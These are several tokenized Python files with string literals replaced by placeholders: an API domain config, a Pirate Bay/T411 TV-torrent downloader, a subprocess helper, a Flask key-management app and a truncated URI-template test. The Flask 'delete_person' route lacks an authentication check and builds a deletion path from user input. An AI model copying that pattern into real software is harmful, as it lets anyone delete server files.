= { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : True } <EOL> users [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT:POST>' , '<STR_LIT:GET>' ] <EOL> users [ '<STR_LIT>' ] = '<STR_LIT:user>' <EOL> users [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:username>' <EOL> invoices = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } , <EOL> } <EOL> } <EOL> versioned_invoices = copy . deepcopy ( invoices ) <EOL> versioned_invoices [ '<STR_LIT>' ] = True <EOL> required_invoices = copy . 
deepcopy ( invoices ) <EOL> required_invoices [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = True <EOL> companies = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:title>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> } <EOL> } <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> } <EOL> } <EOL> } <EOL> users_overseas = copy . deepcopy ( users ) <EOL> users_overseas [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> users_overseas [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> payments = { <EOL> '<STR_LIT>' : [ '<STR_LIT:GET>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:GET>' ] , <EOL> } <EOL> empty = copy . deepcopy ( invoices ) <EOL> user_restricted_access = copy . deepcopy ( contacts ) <EOL> user_restricted_access [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> user_restricted_access [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> users_invoices = copy . deepcopy ( invoices ) <EOL> users_invoices [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> users_invoices [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> users_required_invoices = copy . deepcopy ( required_invoices ) <EOL> users_required_invoices [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> users_required_invoices [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> users_searches = copy . 
deepcopy ( invoices ) <EOL> users_searches [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> users_searches [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> internal_transactions = { <EOL> '<STR_LIT>' : [ '<STR_LIT:GET>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:GET>' ] , <EOL> '<STR_LIT>' : True <EOL> } <EOL> ids = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT:id>' , <EOL> '<STR_LIT>' : [ '<STR_LIT:POST>' , '<STR_LIT:GET>' ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } <EOL> } <EOL> } <EOL> login = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:password>' : <NUM_LIT:0> <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:email>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True <EOL> } , <EOL> '<STR_LIT:password>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> } <EOL> } <EOL> products = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : <NUM_LIT:16> <EOL> } , <EOL> '<STR_LIT:title>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:32> <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> } <EOL> } <EOL> child_products = copy . deepcopy ( products ) <EOL> child_products [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> child_products [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' } <EOL> exclusion = copy . 
deepcopy ( contacts ) <EOL> exclusion [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> exclusion [ '<STR_LIT>' ] = True <EOL> exclusion [ '<STR_LIT>' ] [ '<STR_LIT:source>' ] = '<STR_LIT>' <EOL> exclusion [ '<STR_LIT>' ] [ '<STR_LIT>' ] = { '<STR_LIT:int>' : <NUM_LIT:0> } <EOL> DOMAIN = { <EOL> '<STR_LIT>' : disabled_bulk , <EOL> '<STR_LIT>' : contacts , <EOL> '<STR_LIT>' : users , <EOL> '<STR_LIT>' : users_overseas , <EOL> '<STR_LIT>' : invoices , <EOL> '<STR_LIT>' : versioned_invoices , <EOL> '<STR_LIT>' : required_invoices , <EOL> '<STR_LIT>' : payments , <EOL> '<STR_LIT>' : empty , <EOL> '<STR_LIT>' : user_restricted_access , <EOL> '<STR_LIT>' : users_invoices , <EOL> '<STR_LIT>' : users_required_invoices , <EOL> '<STR_LIT>' : users_searches , <EOL> '<STR_LIT>' : companies , <EOL> '<STR_LIT>' : internal_transactions , <EOL> '<STR_LIT>' : ids , <EOL> '<STR_LIT>' : login , <EOL> '<STR_LIT>' : products , <EOL> '<STR_LIT>' : child_products , <EOL> '<STR_LIT>' : exclusion , <EOL> } </s>
<s> __appname__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __doc__ = '''<STR_LIT>''' <EOL> import getopt <EOL> import sys <EOL> import logging <EOL> import re <EOL> import t411 <EOL> try : <EOL> import tpb <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> import tvdb_api <EOL> except : <EOL> tvdbapi_tag = False <EOL> else : <EOL> tvdbapi_tag = True <EOL> try : <EOL> import transmissionrpc <EOL> except : <EOL> transmissionrpc_tag = False <EOL> else : <EOL> transmissionrpc_tag = True <EOL> tpb_url = "<STR_LIT>" <EOL> tpb_categories = { } <EOL> tpb_categories_ld = { tpb . CATEGORIES . VIDEO . TV_SHOWS : '<STR_LIT>' } <EOL> tpb_categories_hd = { tpb . CATEGORIES . VIDEO . HD_TV_SHOWS : '<STR_LIT>' } <EOL> transmission_rcp = "<STR_LIT>" <EOL> class tvdb ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , title = "<STR_LIT>" ) : <EOL> self . tvdb_tag = tvdbapi_tag <EOL> if ( self . tvdb_tag ) : <EOL> self . tvdb = tvdb_api . Tvdb ( ) <EOL> try : <EOL> self . tvdb_serie = self . get_serie ( title ) <EOL> except : <EOL> self . tvdb_serie = None <EOL> self . tvdb_season = None <EOL> self . tvdb_episode = None <EOL> def get_serie ( self , title = "<STR_LIT>" ) : <EOL> if ( self . tvdb_tag ) : <EOL> self . tvdb_serie = self . tvdb [ title ] <EOL> self . data = self . tvdb_serie . data <EOL> return self . tvdb_serie <EOL> def get_season ( self , season = <NUM_LIT:0> ) : <EOL> if ( self . tvdb_tag and ( self . tvdb_serie != None ) ) : <EOL> self . tvdb_season = self . tvdb_serie [ season ] <EOL> return self . tvdb_season <EOL> def get_season_number ( self ) : <EOL> if ( self . tvdb_tag and ( self . tvdb_serie != None ) ) : <EOL> return len ( self . tvdb_serie ) - <NUM_LIT:1> <EOL> return - <NUM_LIT:1> <EOL> def get_episode ( self , season , episode ) : <EOL> if ( self . tvdb_tag and ( self . 
tvdb_serie != None ) ) : <EOL> self . tvdb_episode = self . tvdb_serie [ season ] [ episode ] <EOL> return self . tvdb_episode <EOL> def get_episode_number ( self , season ) : <EOL> if ( self . tvdb_tag and ( self . tvdb_serie != None ) ) : <EOL> return len ( self . tvdb_serie [ season ] ) <EOL> return - <NUM_LIT:1> <EOL> class series_t411 ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> title = "<STR_LIT>" , season = "<STR_LIT>" , episode = "<STR_LIT>" , seeders_min = <NUM_LIT:0> , directory_download = None ) : <EOL> self . title = title <EOL> self . source = self . __readsource__ ( ) <EOL> self . season = season <EOL> self . episode = episode <EOL> self . seeders_min = seeders_min <EOL> self . dir_download = directory_download <EOL> self . regexp = self . search_regexp ( ) <EOL> logging . debug ( "<STR_LIT>" % self . regexp ) <EOL> self . list = self . buildlist ( ) <EOL> self . list . sort ( key = lambda torrent : int ( torrent [ <NUM_LIT:1> ] ) , reverse = True ) <EOL> logging . info ( "<STR_LIT>" % len ( self . list ) ) <EOL> def downloadbest ( self ) : <EOL> best = self . getbest ( ) <EOL> if best is not None : <EOL> return self . source . download ( best [ <NUM_LIT:2> ] , filename = best [ <NUM_LIT:0> ] , directory = self . dir_download ) <EOL> else : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return None <EOL> def __readsource__ ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> src = t411 . T411 ( ) <EOL> except Exception as e : <EOL> logging . error ( "<STR_LIT>" % e . message ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return src <EOL> def search_regexp ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( ( self . season == "<STR_LIT>" ) and ( self . episode == "<STR_LIT>" ) ) : <EOL> regexp = '<STR_LIT>' % self . title . lower ( ) <EOL> elif ( self . episode == "<STR_LIT>" ) : <EOL> regexp = '<STR_LIT>' % ( self . title . lower ( ) , self . season , self . 
season ) <EOL> else : <EOL> regexp = '<STR_LIT>' % ( self . title . lower ( ) , self . season , self . episode , self . season , self . episode ) <EOL> return regexp <EOL> def buildlist ( self , category = tpb . CATEGORIES . VIDEO . TV_SHOWS , limit = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> s = self . source . search ( self . title . lower ( ) , limit ) <EOL> except Exception as e : <EOL> logging . error ( "<STR_LIT>" ) <EOL> logging . error ( e . message ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> for t in s . items ( ) : <EOL> pass <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> torrentlist = [ ] <EOL> for torrent in s [ '<STR_LIT>' ] : <EOL> if isinstance ( torrent , dict ) : <EOL> if ( re . search ( self . regexp , torrent [ '<STR_LIT:name>' ] . lower ( ) ) and ( int ( torrent [ '<STR_LIT>' ] ) >= self . seeders_min ) ) : <EOL> torrentlist . append ( ( torrent [ '<STR_LIT:name>' ] , torrent [ '<STR_LIT>' ] , torrent [ '<STR_LIT:id>' ] ) ) <EOL> logging . debug ( "<STR_LIT>" % ( len ( torrentlist ) ) ) <EOL> return torrentlist <EOL> def getbest ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . list ) > <NUM_LIT:0> ) : <EOL> return self . list [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def getall ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . list ) > <NUM_LIT:0> ) : <EOL> return self . list <EOL> else : <EOL> return None <EOL> class series_pb ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tpb_url = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , season = "<STR_LIT>" , episode = "<STR_LIT>" , seeders_min = <NUM_LIT:0> ) : <EOL> self . tpb_url = tpb_url <EOL> self . source = self . __readsource__ ( ) <EOL> self . title = title <EOL> self . season = season <EOL> self . episode = episode <EOL> self . seeders_min = seeders_min <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . tvdb = tvdb ( self . title ) <EOL> self . regexp = self . 
search_regexp ( ) <EOL> logging . debug ( "<STR_LIT>" % self . regexp ) <EOL> self . list = [ ] <EOL> for c in tpb_categories . keys ( ) : <EOL> self . list += self . buildlist ( category = c ) <EOL> self . list . sort ( key = lambda torrent : torrent [ <NUM_LIT:1> ] , reverse = True ) <EOL> logging . info ( "<STR_LIT>" % len ( self . list ) ) <EOL> def __tpb_error_ ( self ) : <EOL> logging . info ( "<STR_LIT>" % self . tpb_url ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> def __readsource__ ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> s = tpb . TPB ( self . tpb_url ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> self . __tpb_error_ ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> logging . debug ( "<STR_LIT>" ) <EOL> return s <EOL> def search_regexp ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( ( self . season == "<STR_LIT>" ) and ( self . episode == "<STR_LIT>" ) ) : <EOL> try : <EOL> print ( "<STR_LIT>" % ( self . tvdb . data [ '<STR_LIT>' ] , self . tvdb . get_season_number ( ) , self . tvdb . data [ '<STR_LIT:status>' ] . lower ( ) ) ) <EOL> except : <EOL> pass <EOL> regexp = '<STR_LIT>' % self . title . lower ( ) <EOL> elif ( self . episode == "<STR_LIT>" ) : <EOL> try : <EOL> print ( "<STR_LIT>" % ( self . tvdb . data [ '<STR_LIT>' ] , self . tvdb . get_episode_number ( int ( self . season ) ) , self . season ) ) <EOL> except : <EOL> pass <EOL> regexp = '<STR_LIT>' % ( self . title . lower ( ) , self . season , self . season ) <EOL> else : <EOL> try : <EOL> print ( "<STR_LIT>" % ( self . tvdb . data [ '<STR_LIT>' ] , self . season , self . episode , self . tvdb . get_episode ( int ( self . season ) , int ( self . episode ) ) [ '<STR_LIT>' ] ) ) <EOL> except : <EOL> pass <EOL> regexp = '<STR_LIT>' % ( self . title . lower ( ) , self . season , self . episode , self . season , self . episode ) <EOL> return regexp <EOL> def buildlist ( self , category = tpb . CATEGORIES . VIDEO . 
TV_SHOWS ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> s = self . source . search ( self . title . lower ( ) , category = category ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> self . __tpb_error_ ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> logging . info ( "<STR_LIT>" % ( self . title . lower ( ) , tpb_categories [ category ] ) ) <EOL> try : <EOL> for t in s . items ( ) : <EOL> pass <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> self . __tpb_error_ ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> torrentlist = [ ] <EOL> for t in s . items ( ) : <EOL> if ( re . search ( self . regexp , t . title . lower ( ) ) and ( t . seeders >= self . seeders_min ) ) : <EOL> torrentlist . append ( ( t . title , t . seeders , t . magnet_link , t . torrent_link ) ) <EOL> logging . debug ( "<STR_LIT>" % ( len ( torrentlist ) , tpb_categories [ category ] ) ) <EOL> return torrentlist <EOL> def getbest ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . list ) > <NUM_LIT:0> ) : <EOL> return self . list [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def getall ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . list ) > <NUM_LIT:0> ) : <EOL> return self . list <EOL> else : <EOL> return None <EOL> def printSyntax ( ) : <EOL> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> def printVersion ( ) : <EOL> """<STR_LIT>""" <EOL> print ( __appname__ + "<STR_LIT>" + __version__ ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> global _DEBUG_ <EOL> _DEBUG_ = False <EOL> global tpb_url <EOL> global tpb_categories <EOL> global transmission_rcp <EOL> global tvdbapi_tag <EOL> serie_title = None <EOL> search_type = None <EOL> serie_season = "<STR_LIT>" <EOL> serie_episode = "<STR_LIT>" <EOL> seeders_min = <NUM_LIT:0> <EOL> download_tag = False <EOL> display_all_tag = False <EOL> hd_tag = False <EOL> save_torrent_dir = None <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" ) <EOL> except getopt . 
GetoptError as err : <EOL> print ( "<STR_LIT>" % str ( err ) ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> for opt , arg in opts : <EOL> if opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> serie_title = arg <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> serie_season = arg <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> serie_episode = arg <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> seeders_min = int ( arg ) <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> hd_tag = True <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> download_tag = True <EOL> elif opt in ( "<STR_LIT:-c>" ) : <EOL> transmission_rcp = arg <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> tpb_url = arg <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> display_all_tag = True <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> tvdbapi_tag = False <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> printVersion ( ) <EOL> printSyntax ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> _DEBUG_ = True <EOL> logging . basicConfig ( <EOL> level = logging . INFO , <EOL> format = '<STR_LIT>' , <EOL> datefmt = '<STR_LIT>' , <EOL> ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> _DEBUG_ = True <EOL> logging . basicConfig ( <EOL> level = logging . DEBUG , <EOL> format = '<STR_LIT>' , <EOL> datefmt = '<STR_LIT>' , <EOL> ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> if arg == '<STR_LIT>' or arg == '<STR_LIT>' : <EOL> search_type = arg <EOL> else : <EOL> logging . error ( '<STR_LIT>' ) <EOL> sys . 
exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> logging . info ( '<STR_LIT>' % arg ) <EOL> save_torrent_dir = arg <EOL> else : <EOL> printSyntax ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if ( not _DEBUG_ ) : <EOL> logging . basicConfig ( <EOL> level = logging . ERROR , <EOL> format = '<STR_LIT>' , <EOL> datefmt = '<STR_LIT>' , <EOL> ) <EOL> logging . info ( "<STR_LIT>" % ( __appname__ , __version__ ) ) <EOL> if ( serie_title is None ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" % serie_title ) <EOL> if search_type == None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> if search_type == '<STR_LIT>' : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> if ( serie_season != "<STR_LIT>" ) : <EOL> logging . info ( "<STR_LIT>" % serie_season ) <EOL> if ( serie_episode != "<STR_LIT>" ) : <EOL> logging . info ( "<STR_LIT>" % serie_episode ) <EOL> if ( download_tag and not transmissionrpc_tag ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if ( hd_tag ) : <EOL> tpb_categories . update ( tpb_categories_hd ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> tpb_categories . update ( tpb_categories_ld ) <EOL> tpb_categories . update ( tpb_categories_hd ) <EOL> if ( download_tag and display_all_tag ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if ( download_tag and not display_all_tag ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> try : <EOL> transmission_rcp_host , transmission_rcp_port = transmission_rcp . split ( '<STR_LIT::>' ) <EOL> transmission_rcp_port = int ( transmission_rcp_port ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" % ( transmission_rcp_host , transmission_rcp_port ) ) <EOL> else : <EOL> logging . 
info ( "<STR_LIT>" ) <EOL> if ( display_all_tag ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> if ( tvdbapi_tag ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> if ( save_torrent_dir and not download_tag ) : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if search_type == '<STR_LIT>' : <EOL> logging . info ( "<STR_LIT>" % tpb_url ) <EOL> serie = series_pb ( tpb_url = tpb_url , title = serie_title , season = serie_season , episode = serie_episode , seeders_min = seeders_min ) <EOL> else : <EOL> serie = series_t411 ( title = serie_title , season = serie_season , episode = serie_episode , seeders_min = seeders_min , directory_download = save_torrent_dir ) <EOL> best = serie . getbest ( ) <EOL> if ( best is not None ) : <EOL> if ( display_all_tag ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> for r in serie . getall ( ) : <EOL> print ( "<STR_LIT:*>" * <NUM_LIT> ) <EOL> print ( "<STR_LIT>" % r [ <NUM_LIT:0> ] ) <EOL> print ( "<STR_LIT>" % r [ <NUM_LIT:1> ] ) <EOL> if search_type == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" % r [ <NUM_LIT:2> ] ) <EOL> else : <EOL> print ( "<STR_LIT>" % r [ <NUM_LIT:2> ] ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" % best [ <NUM_LIT:0> ] ) <EOL> print ( "<STR_LIT>" % best [ <NUM_LIT:0> ] ) <EOL> print ( "<STR_LIT>" % best [ <NUM_LIT:1> ] ) <EOL> if search_type == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" % best [ <NUM_LIT:2> ] ) <EOL> else : <EOL> print ( "<STR_LIT>" % best [ <NUM_LIT:2> ] ) <EOL> else : <EOL> print ( "<STR_LIT>" % serie_title ) <EOL> if ( ( best is not None ) and download_tag ) : <EOL> uri = None <EOL> if search_type == '<STR_LIT>' : <EOL> uri = best [ <NUM_LIT:2> ] <EOL> logging . info ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % uri ) <EOL> try : <EOL> tc = transmissionrpc . 
Client ( transmission_rcp_host , port = transmission_rcp_port ) <EOL> except : <EOL> print ( "<STR_LIT>" % ( transmission_rcp_host , transmission_rcp_port ) ) <EOL> print ( "<STR_LIT>" % ( transmission_rcp_host , transmission_rcp_port ) ) <EOL> logging . info ( "<STR_LIT>" % ( transmission_rcp_host , transmission_rcp_port ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> logging . debug ( "<STR_LIT>" ) <EOL> try : <EOL> if search_type == '<STR_LIT>' : <EOL> tc . add_uri ( best [ <NUM_LIT:2> ] ) <EOL> else : <EOL> tc . add ( serie . downloadbest ( ) ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import subprocess <EOL> import threading <EOL> def run_command ( cmd_list , timeout = <NUM_LIT> ) : <EOL> process = [ None ] <EOL> stdout = [ None ] <EOL> stderr = [ None ] <EOL> def proc_fn ( ) : <EOL> process [ <NUM_LIT:0> ] = subprocess . Popen ( cmd_list , universal_newlines = True , shell = False , <EOL> stdin = subprocess . PIPE , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> stdout [ <NUM_LIT:0> ] , stderr [ <NUM_LIT:0> ] = process [ <NUM_LIT:0> ] . communicate ( ) <EOL> proc_thread = threading . Thread ( target = proc_fn ) <EOL> proc_thread . start ( ) <EOL> proc_thread . join ( timeout ) <EOL> if not proc_thread . is_alive ( ) : <EOL> return stdout [ <NUM_LIT:0> ] + stderr [ <NUM_LIT:0> ] <EOL> else : <EOL> process [ <NUM_LIT:0> ] . terminate ( ) <EOL> proc_thread . join ( <NUM_LIT:0.5> ) <EOL> if proc_thread . is_alive ( ) : <EOL> process [ <NUM_LIT:0> ] . kill ( ) <EOL> return "<STR_LIT>" </s>
<s> from git2web import app <EOL> from git2web . functions import list_of_members <EOL> from werkzeug import secure_filename <EOL> from flask import session , redirect , g , url_for , render_template , flash , request <EOL> import os <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def showpeople ( ) : <EOL> if not session . get ( '<STR_LIT>' ) : <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> names = list_of_members ( ) <EOL> return render_template ( '<STR_LIT>' , names = names ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def add_persons ( ) : <EOL> if not session . get ( '<STR_LIT>' ) : <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> f = request . files [ '<STR_LIT>' ] <EOL> filename = secure_filename ( f . filename ) <EOL> filepath = os . path . join ( app . config [ '<STR_LIT>' ] , '<STR_LIT>' , filename ) <EOL> if filename . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> if not os . path . exists ( filepath ) : <EOL> f . save ( filepath ) <EOL> flash ( '<STR_LIT>' ) <EOL> else : <EOL> flash ( '<STR_LIT>' ) <EOL> else : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def delete_person ( name ) : <EOL> keyfile = name + '<STR_LIT>' <EOL> keypath = os . path . join ( app . config [ '<STR_LIT>' ] , '<STR_LIT>' , keyfile ) <EOL> if os . path . exists ( keypath ) : <EOL> if not os . remove ( keypath ) : <EOL> flash ( name + '<STR_LIT>' ) <EOL> else : <EOL> flash ( '<STR_LIT>' + name ) <EOL> else : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) </s>
<s> from __future__ import unicode_literals <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from . util . ordereddict import OrderedDict <EOL> from httpstream import URI , URITemplate <EOL> def test_expansion_with_no_variables ( ) : <EOL> uri_template = URITemplate ( "<STR_LIT:{}>" ) <EOL> uri = uri_template . expand ( ) <EOL> assert uri == URI ( "<STR_LIT>" ) <EOL> def _test_expansions ( expansions ) : <EOL> variables = { <EOL> "<STR_LIT:count>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:hello>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:value>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:path>" : "<STR_LIT>" , <EOL> "<STR_LIT:list>" : ( "<STR_LIT>" , "<STR_LIT>" , 